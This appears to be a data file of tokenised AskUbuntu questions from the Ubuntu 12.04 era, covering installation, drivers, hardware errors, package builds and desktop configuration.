160286	how to install programs on other ubuntu machines without using the internet	i have several computers running ubuntu . i also have a slow internet connection . if i install programs using apt-get , does that put installation files somewhere which i can access , so that i can use those to also install the same programs on my other ubuntu machine instead of having to download the same thing multiple times from the net ? what 's the way to do this ?
160287	installing ubuntu on a pc with win 8 and win 7 and just remove win 8	i have a pc with win 7 and win 8 consumer preview , i downloaded ubuntu 12 and want to replace win 8 by ubuntu without removing win 7 and erasing my hard disk and i also do n't have any option to backup ... .pls help ... .
160289	why ca n't i access the virtual terminal tty1 under vmware workstation ?	i have ubuntu installed inside vmware workstation 8 . the host os is ubuntu 11.10 . when i boot ubuntu , and login , all is ok . but when i try to open console ctrl+alt+f1 it does not . i have vmware tools installed . how can i fix this ?
160301	code folding plug-in for gedit 3.2.1 ?	i need the code folding property in gedit , and i found online a folding.gedit-plugin online , but it never works . my gedit is of version 3.2.1 , and it is said that the plugin folding.gedit-plugin was made for 2.x version only . so is there a code folding plugin for gedit of version 3.2.1 ? thanks !
160311	can not install gnome extensions from gnome site	i have installed ubuntu 12.04 and installed gnome-shell on my system . i am attempting to download the user theme extensions from extensions.gnome.org , but i ca n't see this `` switch '' everyone 's talking about . i 've tried both chromium and firefox browsers on the site . i found a similar subject on how to install gnome shell extensions i followed the directions but i have a warning about gnome common dependencies . i installed gnome-extensions-common without an error but i still can not install user-themes , and i ca n't find the mysterious `` switch '' . any ideas ? edit : my gnome version is 3.4.1 . i 've tried resetting my gnome settings . using the directions here . i still get no switch on the extension site , and here is the error i get from the terminal : the following packages have unmet dependencies : gnome-shell-extensions-user-theme : depends : gnome-shell-extensions-common but it is not going to be installed e : unable to correct problems , you have held broken packages .
160312	how do i build allegro ?	i 'm trying to build allegro on 12.04 but it continues to give me error , i 've downloaded the tar.gz folder of version 5.0.7 and installed cmake , what else do i need ? and how do i proceed ?
160316	how do i install the latest python-opencv in 64-bit ubuntu ?	i heard that opencv supports only 32 bit python . but my os is ubuntu 12.04 64 bit and it has python 2.7 64 bit . how can i install latest opencv-python bindings on this system for 32 bit python ? .
160322	what is the best free program to burn dvd movies from dvd movie files that are present on the hard drive the way imgburn does it in windows ?	evaluating burning programs is difficult : it takes more time to find how things really are , and meanwhile the errors are very unpleasant . also , a lot of people , in linux as well as in windows , seem to take it very lightly when evaluating burning software . i have read along the years a lot of good comments on all sort of windows programs that after a while prove not to worth trying - at the expense of my time , lost data and nerves . burning software is good until it is proved otherwise , which usually does n't take to long . they should be discussed against reliable benchmarks set by well confirmed software : nero , and lately imgburn ( and maybe also cdburnerxp ) in windows . i have looked at acetoneiso , brasero , and k3b ( which many recommend ) but they seem more limited than the mentioned windows apps . they are all said to work , but then at a more basic level ( create iso , burn them , etc. ) . when it comes to something like creating a dvd movie disk from dvd movie files present on the hard drive , it seems to me that i would have to firstly create the iso and then burn it , which involves using more hard drive space and more time . my own experience with the most recommended ubuntu burning software ( k3b , k9copy ) was bad . ( could it be related to their k-related condition and my xfce de ? ) one is not bound to give a second try to one peace of software that crashes or gives an unreadable disk the first time . in ubuntu the situation on the matter is for now similar to that in windows of some years ago when nero ruled unrivaled . until came imgburn - which , yes , works in wine . ( there is a nero 4 for linux . it costs money . the sweetest taboo . ) what other options are there ? ( i am in xubuntu 11.10 ) .
160324	what is the equivalent of # compiz -- replace in lubuntu ?	what is the equivalent of this command in lubuntu ? # compiz -- replace
160325	how can i copy files to my ipod using rhythmbox ?	i do n't want to sync my apple brand product with rhythmbox , i just want to be able to drag and drop mp3s , similar to the way you might apply files to a usb drive . this has in the past worked without failure , does anyone know why it might have stopped working ? do i need to tell you my ipod version , or what release of ubuntu i 'm on ?
160329	usb keyboard works occasionally	a few days ago i bought a sl640 hama usb keyboard to use on my laptop with ubuntu 12.04 . but i 'm having problems , as it works one time out of 10 ! on my girlfriend 's laptop , which runs windows vista , this keyboard always works . it also always works on my laptop , when i boot into windows 7 instead of ubuntu . here are some infos : ~ $ lsusb bus 006 device 003 : id 04d9:1503 holtek semiconductor , inc. shortboard lefty as you can see , the os recognized it but the keyboard does n't react ... even the caps lock and num lock keys do n't blink . regarding the legacy support ( useful for grub ) , i have found no entry in the bios . but i 'm not interested in it . i just want to use it in ubuntu . however , in grub it works sometimes . surprisingly , now i have booted my laptop : the usb keyboard has n't worked in grub but it has worked since the ubuntu login ! and now i 'm typing with it . well.. it means that ubuntu has the right drivers and they work . but how to `` load '' them always correctly ? here 's another example : after several plug/unplug actions , now it works . here 's the output of dmesg : [ 1007.280090 ] usb 6-1 : usb disconnect , device number 19 [ 1010.192060 ] usb 5-2 : new low-speed usb device number 20 using uhci_hcd [ 1010.732051 ] usb 5-2 : device not accepting address 20 , error -84 [ 1010.844046 ] usb 5-2 : new low-speed usb device number 21 using uhci_hcd [ 1011.133123 ] usb 5-2 : ca n't set config # 1 , error -84 [ 1029.848104 ] usb 5-2 : usb disconnect , device number 21 [ 1038.064057 ] usb 4-2 : new low-speed usb device number 4 using uhci_hcd [ 1038.363131 ] usb 4-2 : ca n't set config # 1 , error -84 [ 1089.120105 ] usb 4-2 : usb disconnect , device number 4 [ 1096.460073 ] usb 6-1 : new low-speed usb device number 20 using uhci_hcd [ 1097.060046 ] usb 6-1 : device not accepting address 20 , error -71 [ 1097.172077 ] usb 6-1 : new low-speed usb device number 21 using uhci_hcd [ 1097.534131 ] generic-usb : probe of 0003:04d9:1503.0016 failed with error -84 [ 1097.554110 ] generic-usb : probe of 0003:04d9:1503.0017 failed with error -32 [ 1140.952075 ] usb 6-1 : usb disconnect , device number 21 [ 1145.968084 ] usb 6-1 : new low-speed usb device number 22 using uhci_hcd [ 1146.512052 ] usb 6-1 : device not accepting address 22 , error -71 [ 1146.624087 ] usb 6-1 : new low-speed usb device number 23 using uhci_hcd [ 1146.957109 ] generic-usb : probe of 0003:04d9:1503.0018 failed with error -84 [ 1147.000116 ] generic-usb : probe of 0003:04d9:1503.0019 failed with error -84 [ 1199.480080 ] usb 6-1 : usb disconnect , device number 23 [ 1201.928080 ] usb 5-2 : new low-speed usb device number 22 using uhci_hcd [ 1202.301173 ] generic-usb : probe of 0003:04d9:1503.001a failed with error -84 [ 1202.342182 ] generic-usb : probe of 0003:04d9:1503.001b failed with error -84 [ 1227.008092 ] usb 5-2 : usb disconnect , device number 22 [ 1234.416066 ] usb 4-2 : new low-speed usb device number 5 using uhci_hcd [ 1234.960058 ] usb 4-2 : device not accepting address 5 , error -71 [ 1235.072071 ] usb 4-2 : new low-speed usb device number 6 using uhci_hcd [ 1235.616071 ] usb 4-2 : device not accepting address 6 , error -84 [ 1235.728071 ] usb 4-2 : new low-speed usb device number 7 using uhci_hcd [ 1235.903088 ] usb 4-2 : ca n't set config # 1 , error -84 [ 1258.256080 ] usb 4-2 : usb disconnect , device number 7 [ 1265.796058 ] usb 5-2 : new low-speed usb device number 23 using uhci_hcd [ 1266.388076 ] usb 5-2 : device not accepting address 23 , error -71 [ 1266.500074 ] usb 5-2 : new low-speed usb device number 24 using uhci_hcd [ 1266.793126 ] usb 5-2 : ca n't set config # 1 , error -84 [ 1333.152111 ] usb 5-2 : usb disconnect , device number 24 [ 1336.520066 ] usb 6-1 : new low-speed usb device number 24 using uhci_hcd [ 1336.805091 ] usb 6-1 : ca n't set config # 1 , error -84 [ 1402.592088 ] usb 6-1 : usb disconnect , device number 24 [ 1406.020078 ] usb 5-2 : new low-speed usb device number 25 using uhci_hcd [ 1406.299121 ] usb 5-2 : ca n't set config # 1 , error -84 [ 1564.288095 ] usb 5-2 : usb disconnect , device number 25 [ 1566.968105 ] usb 6-1 : new low-speed usb device number 25 using uhci_hcd [ 1567.508073 ] usb 6-1 : device not accepting address 25 , error -71 [ 1567.620073 ] usb 6-1 : new low-speed usb device number 26 using uhci_hcd [ 1568.164069 ] usb 6-1 : device not accepting address 26 , error -84 [ 1568.276085 ] usb 6-1 : new low-speed usb device number 27 using uhci_hcd [ 1568.326126 ] usb 6-1 : device descriptor read/all , error -84 [ 1568.440071 ] usb 6-1 : new low-speed usb device number 28 using uhci_hcd [ 1568.651128 ] usb 6-1 : ca n't set config # 1 , error -84 [ 1649.848120 ] usb 6-1 : usb disconnect , device number 28 [ 1653.104073 ] usb 5-2 : new low-speed usb device number 26 using uhci_hcd [ 1653.462591 ] input : usb keyboard as /devices/pci0000:00/0000:00:1d.0/usb5/5-2/5-2:1.0/input/input17 [ 1653.462767 ] generic-usb 0003:04d9:1503.001c : input , hidraw0 : usb hid v1.10 keyboard [ usb keyboard ] on usb-0000:00:1d.0-2/input0 [ 1653.552194 ] input : usb keyboard as /devices/pci0000:00/0000:00:1d.0/usb5/5-2/5-2:1.1/input/input18 [ 1653.552337 ] generic-usb 0003:04d9:1503.001d : input , hidraw1 : usb hid v1.10 device [ usb keyboard ] on usb-0000:00:1d.0-2/input1 how can i fix this problem so the keyboard always works in ubuntu ? please help !
160330	how can i install ubuntu 12.04 for an amd processor ?	when i install ubuntu , do i have to type any codes ?
160331	but after i restarted the system and logged in , my screen went blank except for the cursor	i installed ubuntu 12.04 yesterday . i installed it from a live cd . all went well as per the installer . but after i restarted the system and logged in , my screen went blank except for the cursor . i restarted my system again , but it is always the same . the login screen is displayed but once i enter the password and press the return key , the screen goes blank . please help me with this . this is my system configuration : hp pavilion p6040in home pc . intel core 2 duo e7400 3 gb ram ddr2 500 gb hard disk . running windows 8 customer preview . nvidia geforce7100 graphics .
160336	how to prevent quickly from replacing exec= . * in the .desktop file ?	i 'm still trying to make quicklists work and found the problem : quickly creates debian/rules with sed -i 's|exec= . *|exec=/opt/extras.ubuntu.com/wakeonplan/bin/wakeonplan| ' debian/wakeonplan/usr/share/applications/extras-wakeonplan.desktop ; \ how do i stop it from doing so to use a static quicklist with cli options ?
160339	contract-popup at login	i want to give my notebook to guests of my little hotel as an extra service . i love the ubuntu guest-account and i think that this is the best possible way to help my guests get free internet-access . i found out how to `` design '' their user-accounts with /etc/skel , but unfortunately i have no clue , how to show them a small introduction to the system and a kind of user-agreement `` contract '' when they login . i read of xmessage , but this is too minimalistic . i 'd like to implement some pictures . does anyone have any idea of how to make this possible ? would it be possible that the user is logged out automatically if he rejects the user-agreement ? thank you so much in advance , steve .
160340	why is bugzilla missing from 12.04 ?	why has the bugzilla package been removed from the ubuntu 12.04 repository ? is there any ppa to make it work and update automatically or do i need to download from bugzilla website and backup/compile/install/restore every time ? i could n't find any information on the internet , but some guys having the same issue and no one answering them .
160343	quit application on ctrl+c in quickly framework	i found that when i run my application using `` quickly run '' and press ctrl+c to kill it , the application does not quit . i am using quickly 12.04 . for gtk2 applications , i used def gtk_main_quit ( self , widget , data=none ) : gtk.main_quit ( ) is that enough to do it here with gtk3 ?
160347	vpnc connects but does not set up nameservers in /etc/resolv.conf	i am not a big ubuntu guru , running 12.04 lts version . i need to connect via vpnc from university to the work network . logging in works fine , however i can not reach any machine behind the vpn . also , my internet still works w/o me setting up the work proxy . any help is highly appreciated ! this is my /etc/resolv.conf before connecting : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search [ university-domain ] and this is the same file after connection has been set up : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search [ university-domain ] [ work-domain ] from looking at other resov.conf contents on my colleagues ' machines , the nameserver is not updated to the one within the work network . this is how my colleagues ' resolv.conf looks : # generated by networkmanager domain [ work-domain ] search [ work-domain ] nameserver 147.243.4.86 nameserver 147.243.4.70 nameserver 147.243.1.52 # note : the libc resolver may not support more than 3 nameservers . # the nameservers listed below may not be recognized . nameserver 147.243.1.53 nameserver 147.243.128.216 nameserver 147.243.128.217 my colleague runs an older ubuntu version ( 11.04 i guess ) . please let me know !
160348	ubuntu 12.4 not listed while in boot menu	i am using dell inspiron 17r with windows7 as the primary os to boot my system up . i am new to linux and to begin with , i thought of installing ubuntu 12.4 amd 64 bit version on my laptop . today i performed a successful installation on my laptop but when i reboot , it does n't show me the ubuntu os in the list ( i can only see windows7 ) . is there any way to bring up the ubuntu entry into this list ? while installing i selected the option to have both windows7 and ubuntu os on my laptop . the root drive for both os is c : drive . hence i split the drive into two ( 250 gb for windows7 and 250 gb for ubuntu ) . now i can only see 250gb in my c : \ drive for windows7 . is the remaining 250gb assigned to ubuntu or did i lose that 250gb space ? ? your answers will be highly appreciated..
160350	how to make apt : // urls to open with gdebi or apturl ?	when i click on a apt : // link in chromium ubuntu software center handles the link . how can i change it to gdebi/apturl ?
160360	gtk-window-decorator crashes	i have ubuntu 12.04 with all updates . several days ago on my system program gtk-window-decorator crashes few times in a day . error message : the program 'gtk-window-decorator ' received an x window system error . this probably reflects a bug in the program . the error was 'badwindow ( invalid window parameter ) ' . ( details : serial 30556 error_code 3 request_code 20 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) how can i stop it ?
160364	how to let muon update manager run without entering a password ?	how to prevent muon from asking a password when installing updates ? adding user all= ( all ) nopasswd : all to sudoers does not help . sudo apt-get upgrade works without a password , but muon is still asking for it . it is very annoying to enter password every day to install updates . ( kubuntu 12.04 )
160365	app showdown : universe dependency	i 'm currently in the process of packaging my submission for the ubuntu app showdown . i read in the rules that the package may not have dependencies that are not in the ubuntu repository . but what exactly does that mean ? may i upload a package that depends on another package in the universe repository ? and if so , how to i submit it to make the build-service happy ? and if this is not allowed , how should i go about this ? include the library directly in my package ? thanks , adrian
160368	nvidia drivers and gpu	i 've a laptop with an nvidia optimus graphic card ( geforce gt 630m ) with ubuntu 12.04 installed . after a while of looking around , i found that the optimus controller for linus is bumblebee , so i installed it . i would like to know whether is possible to perform gpu calculations using this driver , or should i install the nvidia driver ? in a first try i installed the nvidia driver , but it did n't work as expected . thank you !
160374	how do i change the launcher commands ?	i 'd like to change the behaviour of the launcher , so that if i click on the firefox icon , it runs the command $ optirun firefox does anyone know how to change it ? thank you
160375	can i use my prepaid phone balance ( in pesos ) to buy from the software centre ?	using local network broadband , we can use it to buy games and applications from load balance . is there any possible ways to use it also in ubuntu software center ? additional : i 'm using mobile broadband for the internet connection , this broadband has a sim card and account number where you can download money from buying a prepaid card worth 100 pesos,300 pesos or 500 pesos , provided by our local network . we use this mobile broadband when there is no wifi connection . there are two kinds of mobile broadband , one is postpaid account and the other is prepaid account . i use prepaid account , this kind of account can load a money for transaction like data plans , from 10 pesos for 30 minutes internet connection or 200 pesos for 5 days internet connection. , and this prepaid account can load 5 pesos up to thousands of pesos . now , if this prepaid mobile broadband can provide money in pesos and has internet connection , i think it can also use it for buying goods or applications or games via internet . i think its only need a software that can detect the sim card number and the money balance for transactions . sorry for my bad english but i hope you got my point .
160376	honeyd is not working properly	what i done till nw is ... . step 1. install the honeyd step 2. made a config file with the name `` honed.conf '' step 3. save the file in the same directory where honeyd package is already . step 4. run the command honeyd -d -f honed.conf . after that didnt get any ip address of honeyd.. is there any concept of dhcp regards this . if yes , plz suggest hw i will get the ip of honeyd with the help of dhcp or it will automatically generate ... i am attaching the screenshot after intering the command honeyd -d -f honed.conf
160383	how can i `` toggle '' the unity launcher ?	i do n't want to hide it , like put my mouse of the top-left/left side of the screen , i want to have like a ccsm plugin that can say to turn it on/off . how can i do this but also have the possibility to restore it again in the future ?
160385	does ubuntu one 's couchdb still work ?	i heard that canonical was about to drop couchdb from ubuntu one , but there still few applications which relies on that : https : //wiki.ubuntu.com/ubuntuone/thirdpartyprojects i tried the stipple , but looks like not replicating . so , i 'm wondering if that 's still works as described in the following code tutorial : make your application sync with ubuntu one i.e . syncing every 10 minutes ?
160386	i changed text size to 0 in gnome tweak	i 've just changed text size to 0 in gnome tweak app . then all of the texts in the app have gone . so i ca n't change text size anymore . i do n't know what to do : d is there any way to fix it using terminal ? using ubuntu 12.04 . waiting for help .
160387	nvidia driver issue	i have a laptop with an nvidia 9300m gs 512mb graphics chip . when i install the nvidia drivers , either of the options ( current or post release ) , it repeats my screen 6 times on the same screen , with grey bars separating them horizontally and a thicker black line vertically . how do i fix this ? update : it appears to believe it is a `` separate x screen '' with a resolution of 640x480 ( wo n't let me set it higher , should be 1366x768 ) it recognises the chip and the laptop models exactly so should work .
160388	how do rsync from within a python script ?	i plan to move file from one system to another system . for this , i am using rsync command in linux terminal . it works fine . but i need to implement this command to python . i am very new in python , so i do n't know the way of defining the rsync command . so please tell the steps to define it . this is my rsync command : rsync -avrz /opt/data/filename root @ ip : /opt/data/file i need to implement this command in a python script .
160389	does ubuntu 12.04 supports for b75 boards ?	i want to build a new computer with intel g840 cpu and gigabyte b75m-d3h motherboard and install ubuntu ( or kubuntu ) 12.04 64bit on it . however , i 'm worried about whether the chip is too new and whether that linux kernel now has support for it . according to the article [ phoronix ] intel core i7 3770k ivy bridge linux performance review , the linux kernel is ready to work on the chip . existing intel sandy bridge motherboards/chipsets are compatible with ivy bridge processors , but earlier this month intel launched the new panther point chipsets that are already compatible with linux too : the b75 , h77 , z75 , z77 , hm75 , hm76 , um77 , and hm77 . but i did n't find further information or cases about running ubuntu on the chip . so , is it ok to run ubuntu on the board ? do i need to upgrade the kernel to a newer version ( 3.4 or 3.5 etc . ) to get the system more smoothly ? or should i choose boards with h61 chip ? thank for your response !
160396	how do i install a windows program in an iso into wine ?	i have a file named x.iso . in this file there is a windows application named x that i want to install then use . how can i install a windows application file named x that is embedded in an iso file into wine and then be able to use it ? note : i am using ubuntu 12.04 . i have wine .
160406	12.04 installation went wrong	i am not very familiar with all the process of installing ubuntu and the how-it-works , but one of my friends had shown me how to install ubuntu 10.something on a partition ( i have windows 7 on the other one ) and it worked nicely , and since then i 've been using ubuntu . the upgrade from 10 to 11 went just fine , but when going from 11 to 12.04 , my computer crashed in the middle ( i do n't remember why ) . but now i have ubuntu 12.04 and i constantly have this red disk with a white dash in it on my desktop bar reminding me that i have a system problem . i believe re-installing ubuntu 12.04 ( if my computer does n't crash during the installation this time ) would work , but i do n't know how to do this . so here is the question : how would i re-install ubuntu 12.04 ? is there a guide out there for this ? thanks .
160408	cursor becomes not working after changing to hand	i just finished downloading a file using firefox , and then the cursor changed to a closed hand and stayed like that . i could only move the cursor around using my touchpad , but it does n't work when i tried to click something . the keyboard seems still work . so i hit alt+f4 keys to kill all the open windows and restarted ubuntu . i wonder if there is some solution for this cursor problem ? ps : my laptop is lenovo t400 and os is ubuntu 12.04 thanks !
160414	howto watch ubuntu one files ( cloud ) ?	is there a library to add ubuntu one files ( cloud ) monitoring facility into my app , e.g . to watch certain folder for the changes ?
160422	how do i install dan 's guardian on 12.04 ?	i 'm trying to install dans guardian on a virtual machine . the instructions ask me to run the ./configure script and then execute the command make install . the configure script runs fine but the make install throws errors . making all in src make [ 2 ] : entering directory `/webmin/dansguardian-2.10/src' g++ -dhave_config_h -i . -i.. -d__conffile= ' '' /usr/local/etc/dansguardian/dansguardian.conf '' ' -d__loglocation= ' '' /usr/local/var/log/dansguardian/ '' ' -d__piddir= ' '' /usr/local/var/run '' ' -d__proxyuser= ' '' nobody '' ' -d__proxygroup= ' '' nobody '' ' -d__confdir= ' '' /usr/local/etc/dansguardian '' ' -g -o2 -mt dansguardian-fancy.o -md -mp -mf .deps/dansguardian-fancy.tpo -c -o dansguardian-fancy.o `test -f 'downloadmanagers/fancy.cpp ' || echo './'`downloadmanagers/fancy.cpp downloadmanagers/fancy.cpp : in member function 창std : :string fancydm : :timestring ( int ) 창 : downloadmanagers/fancy.cpp:507:72 : error : 창snprintf창 was not declared in this scope make [ 2 ] : *** [ dansguardian-fancy.o ] error 1 make [ 2 ] : leaving directory `/webmin/dansguardian-2.10/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/webmin/dansguardian-2.10' make : *** [ all ] error 2 i 'm running 12.04 lts server x64
160423	take a single snaphot from a webcam with a delay	i use gst-launch-0.10 v4l2src num-buffers=1 ! jpegenc ! filesink location= $ home/desktop/test.jpg to take snapshots . it works well . however in some light situation i need to drop some of the first frames the webcam outputs so that the webcam white balance does n't provide me with an impossible to view image . do you know how could i do that ? with the gui of cheese i can do it without any problem , but i need to automate this via cli . many thanks .
160424	how do i get mlocate to only index certain directories ?	i 'd like to use mlocate on my ubuntu server , but only to index certain directories ( e.g . /home and /data , but not everything under / ) . however , mlocate 's standard configuration works the opposite way ; you specify the paths you want to remove ( with prune_paths ) . is there any easy way to achieve this , or any similar utility that will do what i want ? ( note : it should maintain an index like mlocate , so find is not acceptable , for example ) thanks .
160426	setup shortcut keys not working	in my ubuntu 12.04 , in keyboard settings , i did n't find a shortcut key for restarting x , so in `` customer shorcut '' , i set up ctrl+alt+backspace for command sudo restart lightdm . but after that the shortcut does n't work . is it because it requires root privilege ? also i have a sysrq key on my keyboard , which i think to be the '' magic sysreq key '' . my sysrq key is shared with prtsc key ( for screen shoot ) , and is in blue which means i have to press fn key at the same time to invoke sysrq instead of prtsc . but every time i press fn+sysrq , it always shoots a photo of the screen , same as just hitting prtsc i.e . without hitting fn . i wonder how to use the magic sysreq key ? does it mean the shortcut has not been linked to any command that is supposed for magic sysreq key yet ? ps : my laptop is lenovo t400 and os is ubuntu 12.04 . thanks !
160436	can i keep my 10.04 installation and swap in ivy bridge cpu , motherboard and memory	i bought an i5-3570k cpu and an intel dh77df motherboard and memory and i was wondering if i can swap them in for my core 2 duo system and have ubuntu 10.04 still work ( keeping the hard drives ) . before the swap them in i was thinking of changing the video driver to vesa ( or can i just remove the xorg.conf file ) and making sure i plug my hard drives in the correct order on the new motherboard . does anyone know if this will work ? any other things i might have to do ?
160437	installing latest version of ubuntu without losing data	i have an ubuntu version loaded . i want to install latest version without formatting and loss of data . update manager does not show upgradable version to install . if i download and install the latest one , will it damage my existing data ? can it be loaded under upgrading system any other way ?
160441	why do i get this error trying to compile libxml2 ?	although , i installed libxml2 once and reinstalled it a few more times . i can not compile c-source code because the compiler can not find where the header file is . i am able to locate where it is ( in the folder where i downloaded the tar.gz package ) but i had a feeling in my guts that this package is n't installed correctly because when i tried sudo make install , it says /bin/bash : /home/bfaskiplar/downloads/tar.gz : no such file or directory make [ 2 ] : *** [ install-libltlibraries ] error 127 make [ 2 ] : leaving directory `/home/bfaskiplar/downloads/tar.gz packages/libxml2-2.8.0' make [ 1 ] : *** [ install-am ] error 2 make [ 1 ] : leaving directory `/home/bfaskiplar/downloads/tar.gz packages/libxml2-2.8.0' make : *** [ install-recursive ] error 1 this is why i installed synaptic package manager and reinstalled libxml2 , but in this case , is n't it supposed to put header files in default directory where gcc normally searches ? currently , i am able to compile c-source code with -i option , but i wonder why i have to copy headers manually even if i used synaptic for installation and why am i getting error 1 and error 2 when trying to install the package manually . thanks in advance
160448	can i set different passwords for different desktop environments ?	i have installed gnome , unity and cairo dock desktop environments . i wanted to set different passwords for each . is this possible by any means ? thank you .
160451	making the screen darker than the lowest brightness setting	i 'd like to make the screen in ubuntu darker than the lowest brightness setting . is there any way to do this besides inverting the screen brightness ?
160454	why is the firmware missing for my belkin f5d7000 wireless adapter ?	i just installed ubuntu 12.04 on my desktop and in the network setting it shows that the wireless card firmware is missing ; the network is belkin f5d7000 wireless network adapter .
160460	how do i increase the compiz shadow radius above 18 ?	in < 11.10 this can be done from gconf-editor , but that does n't seem to work in 12.04 . the metacity-theme.xml file also set the active shadow much larger than 18 , but no effect . so anyone know how ? the shadow radius in ccsm have a maximum size of 18 ; the shadow can be set to any size below 18 . in older ubuntu , it 's the same case with ccsm , but shadow size can be set from gconf-editor to a larger number .
160462	why does alacarte give me this error when i try to add items to the menu ?	when i try to add anything to the menu in 12.04 , i get this error . $ alacarte traceback ( most recent call last ) : file `` /usr/share/alacarte/alacarte/mainwindow.py '' , line 317 , in on_new_item_button_clicked process = subprocess.popen ( [ 'gnome-desktop-item-edit ' , file_path ] , env=os.environ ) file `` /usr/lib/python2.7/subprocess.py '' , line 679 , in __init__ errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1249 , in _execute_child raise child_exception oserror : [ errno 2 ] no such file or directory
160464	how do i stop `` 5.2 gb swap partition from appearing in `` devices '' list in nautilus ?	i have 12.04 installed and have a 5 gb partition for swap . i want to stop this drive from appearing in the devices list in nautilus . sanjay @ sanjay-pc : ~ $ sudo fdisk -l [ sudo ] password for sanjay : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x6381b89c device boot start end blocks id system /dev/sda1 * 63 83891429 41945683+ 7 hpfs/ntfs/exfat partition 1 does not start on physical sector boundary . /dev/sda2 83891491 976771071 446439790+ f w95 ext 'd ( lba ) partition 2 does not start on physical sector boundary . /dev/sda5 83891493 167782859 41945683+ 7 hpfs/ntfs/exfat partition 5 does not start on physical sector boundary . /dev/sda6 167782923 503332514 167774796 7 hpfs/ntfs/exfat partition 6 does not start on physical sector boundary . /dev/sda7 503332578 587223944 41945683+ 7 hpfs/ntfs/exfat partition 7 does not start on physical sector boundary . /dev/sda8 587224008 671115374 41945683+ 7 hpfs/ntfs/exfat /dev/sda9 671115438 755006804 41945683+ 7 hpfs/ntfs/exfat partition 9 does not start on physical sector boundary . /dev/sda10 755006868 838898234 41945683+ 7 hpfs/ntfs/exfat partition 10 does not start on physical sector boundary . /dev/sda11 838898298 922789664 41945683+ 7 hpfs/ntfs/exfat partition 11 does not start on physical sector boundary . /dev/sda12 922789728 958437899 17824086 83 linux /dev/sda13 958439424 968560639 5060608 83 linux /dev/sda14 968562688 976771071 4104192 82 linux swap / solaris
160468	why is `` no new release '' found after i 'm told its available ?	new release 'oneiric ' available . run 'do-release-upgrade ' to upgrade to it . 2222222-desktop : ~ $ do-release-upgrade checking for a new ubuntu release no new release found why does it say there is an upgrade then says it does not find it ? i have been slowly upgrading from 9x to 11.04 . i had some issues along the way but nothing google could not help me with . now this has me stuck . i have tried sudo apt-get update this worked so it was not the issue i had before where my keys were invalid . sudo apt-get upgrade after that did nothing . sudo do-release-upgrade returned with `` no upgrade found '' do-release-upgrade -d. did the trick . i should have tried it since i did come across the -d tag in researching this . i had thought since the terminal itself knew there was an update available , it should find it . thank you all for helping .
160469	how do i find out if a program uses gtk 2 or 3 ?	thinking of trying to tweak a theme to get inkscape more compact . was wondering if there was a way to tell which version of gtk+ it uses ?
160474	empathy spell check portuguese	the spell checker for portuguese in empathy does n't work . when i mark portuguese , empathy unmarks it . can someone solve this problem ?
160494	which dell laptops are fully compatible with ubuntu 12.04 ?	we need to buy a couple of engineering laptops . our 1st choice would be dell latitude . unfortunately , in the past , my colleague had many problems installing the ubuntu on his e6510 . the main issue was that the screen remained blank after boot . the solution was to connect to an external monitor - but this is not an acceptable solution for a mobile configuration . he ended up recovering the windows installation and he has been using windows on that machine since then . however , all our engineering environment is linux based , so other laptops do have ubuntu installed successfully - inspirons and hp pavilions . the latitude e6520 configuration we are looking for is i7 cpu , 15.6 '' fullhd discrete graphics , 8gb memory , 7200rpm disk and whatever extra hardware that is standard out there . before purchasing , i 'd like to know if anyone experienced problems with such configuration with the plain canonical ubuntu iso discs ( i.e. , non dell specific kernel or the like ) ? additionally , should i expect problems running ubuntu as a guest vm on top of win7 on this laptop ( it works just fine on my hp pavilion ) ?
160496	how do i disable update manager from installing gwibber ?	i donât use gwibber . thus i do n't want it . thus i un-installed it . however update manger still wants to install it again for me . how do i make it not . that is , how do i add certain packages to a blacklist , so that they are not considered for installation ? thank you
160499	how can i install rjags on ubuntu ami on ec2 ?	i installed the pre-built amazon machine image with rstudio server provided by bioconductor into a free micro instance on ec2 . then i installed jags ( just another gibbs sampler to use it via rstudio server . to this end i simply used the rstudio server shell sudo apt-get install jags which worked well as far as i can tell ( if i run it again , it tells me jags is up-to-date ) . however , when i tried to install the package `` rjags '' which is the interface between rstudio and jags via either bioclite ( `` rjags '' ) or install.packages ( `` rjags '' ) , it failed with the error message checking for jags_version in -ljags ... yes configure : error : `` jags module directory /usr/lib64/jags/modules-3 does not exist . '' error : configuration failed for package ‘rjags’ * removing ‘/home/ubuntu/r/library/rjags’ warning in install.packages : installation of package ‘rjags’ had non-zero exit status i checked in lib64 and , indeed , there 's only the directory `` jags '' with `` jags-terminal '' as its content . i 'd be grateful for any pointers , i guess it 's obvious that i 've been enabled to do something beyond my understanding thanks to great tutorials .
160500	failed 12.04 upgrade , recovery mode unavailable with whiptail error	last night i tried to upgrade from ubuntu 11.10 to 12.04 . the upgrade process had numerous errors , but i let it continue assuming that it would safer than interrupting it . near the end , two conflicting messages appeared : `` too many errors '' and there was also a message telling me that the system was upgraded nonetheless . the only option i was presented at that point was to reboot , which i did , but the reboot just hanged . then i tried to boot under `` recovery mode '' but the system gets into an infinite loop with the message /lib/recovery-mode/recovery-menu : line 109 : /lib/recovery-mode/options/whiptail : no such file . i am at a loss . any help is greatly appreciated . thanks .
160506	is uploading icons to myapps on developer.ubuntu.com enough ?	i submitted an app for review via https : //myapps.developer.ubuntu.com/dev/ there were some icons needed in the process . i 've uploaded them . my question is : will these icons somehow be automatically added to my application or should i put them into my program myself ?
160509	how to go full screen in ubuntu 12.04 in vmware player 4.0+	i had recently installed vmware 4.0+ on my windows 7 home premium machine . i installed ubuntu 12.04 lts on it . however , when i turn on my vm , ubuntu does n't run in full screen mode . moreover , the performance of vmware is a bit choppy and not all that smooth . i have a full hd display with 1920x1080 in my windows 7 system . i want to be able to run ubuntu with the same resolution .
